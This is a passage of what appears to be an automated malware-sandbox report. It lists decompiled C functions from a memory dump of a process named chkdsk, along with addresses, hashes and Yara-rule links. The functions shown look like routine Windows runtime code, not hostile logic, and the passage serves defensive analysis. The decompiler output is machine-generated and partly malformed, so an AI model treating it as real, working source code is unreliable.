													_t94 = 0x4e786bc;
													_t87 = 0x4e786b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04D89240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4e786c4;
												_t87 = 0x4e786c0;
												L27:
												E04DB9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04DDD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4e75388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4e7538c = _t51;
						goto L6;
					}
				}
			}




















                                                      0x04d89082
                                                      0x04d89083
                                                      0x04d89084
                                                      0x04d89085
                                                      0x04d89087
                                                      0x04d89096
                                                      0x04d89098
                                                      0x04d89098
                                                      0x04d8909e
                                                      0x04d890a8
                                                      0x04d890e7
                                                      0x04d890e7
                                                      0x04d890aa
                                                      0x04d890b0
                                                      0x04d890b7
                                                      0x04d890bd
                                                      0x04d890dd
                                                      0x04d890e6
                                                      0x04d890bf
                                                      0x04d890bf
                                                      0x04d890c7
                                                      0x04d890cf
                                                      0x04d890f1
                                                      0x04d890f2
                                                      0x04d890f4
                                                      0x04d890f5
                                                      0x04d890f6
                                                      0x04d890f7
                                                      0x04d890f8
                                                      0x04d890f9
                                                      0x04d890fa
                                                      0x04d890fb
                                                      0x04d890fc
                                                      0x04d890fd
                                                      0x04d890fe
                                                      0x04d890ff
                                                      0x04d89100
                                                      0x04d89102
                                                      0x04d89107
                                                      0x04d8910c
                                                      0x04d89110
                                                      0x04d89113
                                                      0x04d89115
                                                      0x04d89136
                                                      0x04d8913f
                                                      0x04d89143
                                                      0x04de37e4
                                                      0x04de37e4
                                                      0x04d89117
                                                      0x04d89117
                                                      0x04d8911d
                                                      0x00000000
                                                      0x04d8911f
                                                      0x04d8911f
                                                      0x04d89125
                                                      0x00000000
                                                      0x04d89127
                                                      0x04d8912d
                                                      0x04d89130
                                                      0x04d89134
                                                      0x04d89158
                                                      0x04d8915d
                                                      0x04d89161
                                                      0x04d89168
                                                      0x04de3715
                                                      0x04d8916e
                                                      0x04d8916e
                                                      0x04d89175
                                                      0x04d89177
                                                      0x04d8917e
                                                      0x04d8917f
                                                      0x04d89182
                                                      0x04d89182
                                                      0x04d89187
                                                      0x04d89187
                                                      0x04d8918a
                                                      0x04d8918d
                                                      0x04d8918f
                                                      0x04d89192
                                                      0x04d89195
                                                      0x04d89198
                                                      0x04d89198
                                                      0x04d89198
                                                      0x04d8919a
                                                      0x00000000
                                                      0x00000000
                                                      0x04de371f
                                                      0x04de3721
                                                      0x04de3727
                                                      0x04de372f
                                                      0x04de3733
                                                      0x04de3735
                                                      0x04de3738
                                                      0x04de373b
                                                      0x04de373d
                                                      0x04de3740
                                                      0x00000000
                                                      0x04de3746
                                                      0x04de3746
                                                      0x04de3749
                                                      0x00000000
                                                      0x04de374f
                                                      0x04de374f
                                                      0x04de3751
                                                      0x04de3757
                                                      0x04de3759
                                                      0x04de375c
                                                      0x04de375c
                                                      0x04de375e
                                                      0x04de375e
                                                      0x04de3761
                                                      0x04de3764
                                                      0x00000000
                                                      0x00000000
                                                      0x04de3766
                                                      0x04de3768
                                                      0x04de37a3
                                                      0x04de37a3
                                                      0x04de37a5
                                                      0x04de37a7
                                                      0x04de37ad
                                                      0x04de37b0
                                                      0x04de37b2
                                                      0x04de37bc
                                                      0x04de37c2
                                                      0x04de37c2
                                                      0x04de37b2
                                                      0x04d89187
                                                      0x04d89187
                                                      0x04d8918a
                                                      0x04d8918d
                                                      0x04d8918f
                                                      0x04d89192
                                                      0x04d89195
                                                      0x00000000
                                                      0x04d89195
                                                      0x00000000
                                                      0x04de376a
                                                      0x04de376a
                                                      0x04de376a
                                                      0x04de376c
                                                      0x04de376c
                                                      0x04de376f
                                                      0x04de3775
                                                      0x00000000
                                                      0x00000000
                                                      0x04de3777
                                                      0x04de3779
                                                      0x04de3782
                                                      0x04de3787
                                                      0x04de3789
                                                      0x04de3790
                                                      0x04de3790
                                                      0x04de378b
                                                      0x04de378b
                                                      0x04de378b
                                                      0x04de3792
                                                      0x04de3795
                                                      0x00000000
                                                      0x04de3795
                                                      0x00000000
                                                      0x04de3779
                                                      0x04de3798
                                                      0x00000000
                                                      0x04de3798
                                                      0x00000000
                                                      0x04de3768
                                                      0x04de379b
                                                      0x04de379b
                                                      0x04de3751
                                                      0x04de3749
                                                      0x00000000
                                                      0x04de3740
                                                      0x04d891a0
                                                      0x04d891a3
                                                      0x04d891a9
                                                      0x04d891b0
                                                      0x00000000
                                                      0x04d891b0
                                                      0x04d89187
                                                      0x04d891b4
                                                      0x04d891b4
                                                      0x04d891bb
                                                      0x04d891c0
                                                      0x04d891c5
                                                      0x04d891c7
                                                      0x04de37da
                                                      0x04d891cd
                                                      0x04d891cd
                                                      0x04d891cd
                                                      0x04d891d2
                                                      0x04d891d5
                                                      0x04d89239
                                                      0x04d89239
                                                      0x04d891d7
                                                      0x04d891db
                                                      0x04d891e1
                                                      0x04d891e7
                                                      0x04d891fd
                                                      0x04d89203
                                                      0x04d8921e
                                                      0x04d89223
                                                      0x00000000
                                                      0x04d89205
                                                      0x04d89205
                                                      0x04d89208
                                                      0x04d8920c
                                                      0x04d89214
                                                      0x04d89214
                                                      0x04d8920c
                                                      0x04d891e9
                                                      0x04d891e9
                                                      0x04d891ee
                                                      0x04d891f3
                                                      0x04d891f3
                                                      0x04d891f3
                                                      0x04d891e7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d89134
                                                      0x04d89125
                                                      0x04d8911d
                                                      0x04d8914e
                                                      0x04d890d1
                                                      0x04d890d1
                                                      0x04d890d3
                                                      0x04d890d6
                                                      0x04d890d8
                                                      0x00000000
                                                      0x04d890d8
                                                      0x04d890cf

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50fc8dd8bbb5cf760fc32bc5a39c934832f7ab9f7d15bcf1dc3fb76872f61213
                                                      • Instruction ID: 372ebfdba540fe71c9268b6186eae605c4c166088546414dc2fb12fc1b3d2340
                                                      • Opcode Fuzzy Hash: 50fc8dd8bbb5cf760fc32bc5a39c934832f7ab9f7d15bcf1dc3fb76872f61213
                                                      • Instruction Fuzzy Hash: 9401F4B2701204AFE314AF15D840B3977E9FB41325F2140AAE145DBBA5C374FC41CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E54015 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E04E54015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04DA2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04DA2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4e786ac);
					E04D8F900(0x4e786d4, _t28);
					E04D9FFB0(0x4e786ac, _t28, 0x4e786ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04D9FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                      0x04e5401a
                                                      0x04e5401e
                                                      0x04e54023
                                                      0x04e54028
                                                      0x04e54029
                                                      0x04e5402b
                                                      0x04e5402f
                                                      0x04e54043
                                                      0x04e54046
                                                      0x04e54051
                                                      0x04e54057
                                                      0x04e5405f
                                                      0x04e54062
                                                      0x04e54067
                                                      0x04e5406f
                                                      0x04e5407c
                                                      0x04e5407c
                                                      0x04e5408c
                                                      0x04e5408c
                                                      0x04e54097

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ba06f03109fcb462bd26f2618e17b8a75805669dd9e3168dcd7800610da74e4
                                                      • Instruction ID: b2ea46947fbfeb769b6d6c0312d21072fbae7b4a85f4b446f3ef11ce57d97a9a
                                                      • Opcode Fuzzy Hash: 9ba06f03109fcb462bd26f2618e17b8a75805669dd9e3168dcd7800610da74e4
                                                      • Instruction Fuzzy Hash: F5017C723019457FE711BF6ACD84E67B7ACFB45668B000669B508C3A61CB24FC61CAF4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E414FB Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E04E414FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4e7d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04DCFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04DA7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                      0x04e414fb
                                                      0x04e414fb
                                                      0x04e4150a
                                                      0x04e41514
                                                      0x04e41519
                                                      0x04e4151b
                                                      0x04e41526
                                                      0x04e4152c
                                                      0x04e41534
                                                      0x04e41537
                                                      0x04e4153a
                                                      0x04e41545
                                                      0x04e41557
                                                      0x04e41547
                                                      0x04e41550
                                                      0x04e41550
                                                      0x04e41562
                                                      0x04e41563
                                                      0x04e41565
                                                      0x04e4156a
                                                      0x04e4157f

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 921d4546a4b712eb50647720c0daea1c960cc5fea329eed9ad6a692f2662abfe
                                                      • Instruction ID: 64fdd7751c913952b7ea5be7a167e8400185290603bbb8f007e15a6b049568b6
                                                      • Opcode Fuzzy Hash: 921d4546a4b712eb50647720c0daea1c960cc5fea329eed9ad6a692f2662abfe
                                                      • Instruction Fuzzy Hash: 7C019271E00248AFDB00DFA9D845FEEB7B8EF44714F00405AF904EB280D674EA40CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E4138A Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E04E4138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4e7d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04DCFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04DA7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                      0x04e4138a
                                                      0x04e4138a
                                                      0x04e41399
                                                      0x04e413a3
                                                      0x04e413a8
                                                      0x04e413aa
                                                      0x04e413b5
                                                      0x04e413bb
                                                      0x04e413c3
                                                      0x04e413c6
                                                      0x04e413c9
                                                      0x04e413d4
                                                      0x04e413e6
                                                      0x04e413d6
                                                      0x04e413df
                                                      0x04e413df
                                                      0x04e413f1
                                                      0x04e413f2
                                                      0x04e413f4
                                                      0x04e413f9
                                                      0x04e4140e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c821e15502262830f3777981ad6cb5b2a97c5b5bbcc4c9bd440bff7a1eb00fd8
                                                      • Instruction ID: cd7a4df89d9c06679d7cdd0c5044df8ecbb65e9661e66dd613e277adc3db4e90
                                                      • Opcode Fuzzy Hash: c821e15502262830f3777981ad6cb5b2a97c5b5bbcc4c9bd440bff7a1eb00fd8
                                                      • Instruction Fuzzy Hash: E0015271A04318AFDB14DFA9D845FAEB7B8EF44714F01405AF904EB280D674EA51CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D858EC Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E04D858EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4e7d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4d65c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04D85943() != 0 &&  *0x4e75320 > 5) {
					E04E07B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04E07B5E( &_v28, _t28);
					_t11 = E04E07B9C(0x4e75320, 0x4d6bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E04DCB640(_t11, _t17, _v8 ^ _t29, 0x4d6bf15, _t27, _t28);
			}















                                                      0x04d858fb
                                                      0x04d858fe
                                                      0x04d85906
                                                      0x04d8590a
                                                      0x04d8593c
                                                      0x04d8593c
                                                      0x04d8590c
                                                      0x04d8590c
                                                      0x04d85911
                                                      0x00000000
                                                      0x04d85913
                                                      0x04d85913
                                                      0x04d85913
                                                      0x04d85911
                                                      0x04d8591d
                                                      0x04de1035
                                                      0x04de103c
                                                      0x04de103f
                                                      0x04de1056
                                                      0x04de1056
                                                      0x04d8593b

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74ae117821cdb0e531fe477b5126a12b203f3bf3f0291e4abd48d28b14fdabc2
                                                      • Instruction ID: 8339ffa6d59375c1fda73b6338bb0d853f86ecfe0ca96bfd4171696092614942
                                                      • Opcode Fuzzy Hash: 74ae117821cdb0e531fe477b5126a12b203f3bf3f0291e4abd48d28b14fdabc2
                                                      • Instruction Fuzzy Hash: C0018431B10104BBE714FB25E811ABE7BBDEF45634B95406D9815AB694DE30FD018690
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E3FEC0 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E04E3FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4e7d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04DCFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04DA7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                      0x04e3fec0
                                                      0x04e3fec0
                                                      0x04e3fecf
                                                      0x04e3fed9
                                                      0x04e3fede
                                                      0x04e3fee0
                                                      0x04e3feeb
                                                      0x04e3fef3
                                                      0x04e3fef6
                                                      0x04e3fef9
                                                      0x04e3ff04
                                                      0x04e3ff16
                                                      0x04e3ff06
                                                      0x04e3ff0f
                                                      0x04e3ff0f
                                                      0x04e3ff21
                                                      0x04e3ff22
                                                      0x04e3ff24
                                                      0x04e3ff29
                                                      0x04e3ff3e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84c7cb3f8535d7bf54b8436eb4be8e291e70b5d05dffd528a1782426ed316ec6
                                                      • Instruction ID: 3423e31c4992fa9b6f5c0a5969741bd7bf7ae5bd4136ff2e84ae12229d798a67
                                                      • Opcode Fuzzy Hash: 84c7cb3f8535d7bf54b8436eb4be8e291e70b5d05dffd528a1782426ed316ec6
                                                      • Instruction Fuzzy Hash: 69018471F00209ABDB14DBA9D845FAEB7B8EF44714F00406AF900EB380EA74EA11C7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E3FE3F Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E04E3FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4e7d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04DCFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04DA7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                      0x04e3fe3f
                                                      0x04e3fe3f
                                                      0x04e3fe4e
                                                      0x04e3fe58
                                                      0x04e3fe5d
                                                      0x04e3fe5f
                                                      0x04e3fe6a
                                                      0x04e3fe72
                                                      0x04e3fe75
                                                      0x04e3fe78
                                                      0x04e3fe83
                                                      0x04e3fe95
                                                      0x04e3fe85
                                                      0x04e3fe8e
                                                      0x04e3fe8e
                                                      0x04e3fea0
                                                      0x04e3fea1
                                                      0x04e3fea3
                                                      0x04e3fea8
                                                      0x04e3febd

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc10631af017f2cb80575dc2e8a6c66f4de8b0ce71ffe86ee736867e7860fecf
                                                      • Instruction ID: fa086651b7635640094fb2047ce56e8725cd846d0486efb19775aef14df39018
                                                      • Opcode Fuzzy Hash: fc10631af017f2cb80575dc2e8a6c66f4de8b0ce71ffe86ee736867e7860fecf
                                                      • Instruction Fuzzy Hash: 0E018471F00209ABDB14DFA9D845FAFB7B8EF44714F00406AF900EB281DA74E911C7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E51074 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04E51074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04E5165E(__ebx, 0x4e78ae4, (__edx -  *0x4e78b04 >> 0x14) + (__edx -  *0x4e78b04 >> 0x14), __edi, __ecx, (__edx -  *0x4e78b04 >> 0x14) + (__edx -  *0x4e78b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04E4AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04DA7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04E3FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                      0x04e51074
                                                      0x04e51080
                                                      0x04e51082
                                                      0x04e5108a
                                                      0x04e5108f
                                                      0x04e51093
                                                      0x04e510ab
                                                      0x04e510ab
                                                      0x04e510c3
                                                      0x04e510cf
                                                      0x04e510e1
                                                      0x04e510d1
                                                      0x04e510da
                                                      0x04e510da
                                                      0x04e510e9
                                                      0x04e510f5
                                                      0x04e510f5
                                                      0x04e510fe

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e71c27871bbae7ae3aba982fa723ac6508b8d0545f7f7cd6d2d8dc184cb91bd
                                                      • Instruction ID: 1d19ce359579939b9135d547718d7d9952d0949f00e33cd9794c7657ae814985
                                                      • Opcode Fuzzy Hash: 4e71c27871bbae7ae3aba982fa723ac6508b8d0545f7f7cd6d2d8dc184cb91bd
                                                      • Instruction Fuzzy Hash: 5F012872A047419BD711EB29C804B1AB7D5AB84318F049629FC85832A0EE70F840CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D9B02A Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04D9B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04DA7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04E07016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                      0x04d9b037
                                                      0x04d9b039
                                                      0x04d9b03b
                                                      0x04d9b040
                                                      0x04dea60e
                                                      0x00000000
                                                      0x00000000
                                                      0x04dea61d
                                                      0x04d9b04b
                                                      0x04d9b04e
                                                      0x04dea627
                                                      0x04dea634
                                                      0x00000000
                                                      0x00000000
                                                      0x04dea641
                                                      0x04dea653
                                                      0x04dea643
                                                      0x04dea64c
                                                      0x04dea64c
                                                      0x04dea65b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04dea66c
                                                      0x04d9b057
                                                      0x04d9b057
                                                      0x04d9b057
                                                      0x04d9b046
                                                      0x04d9b046
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction ID: 4da8150dd922693a7a1ce25fd90d939b2e7a584daddbbcd5df027eed07f353e9
                                                      • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                      • Instruction Fuzzy Hash: 9E018431304980EFD722D75ED984F7677D8FB46754F0A40A6F919CB651E668FC40C620
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E58ED6 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 54%
                                                      			E04E58ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
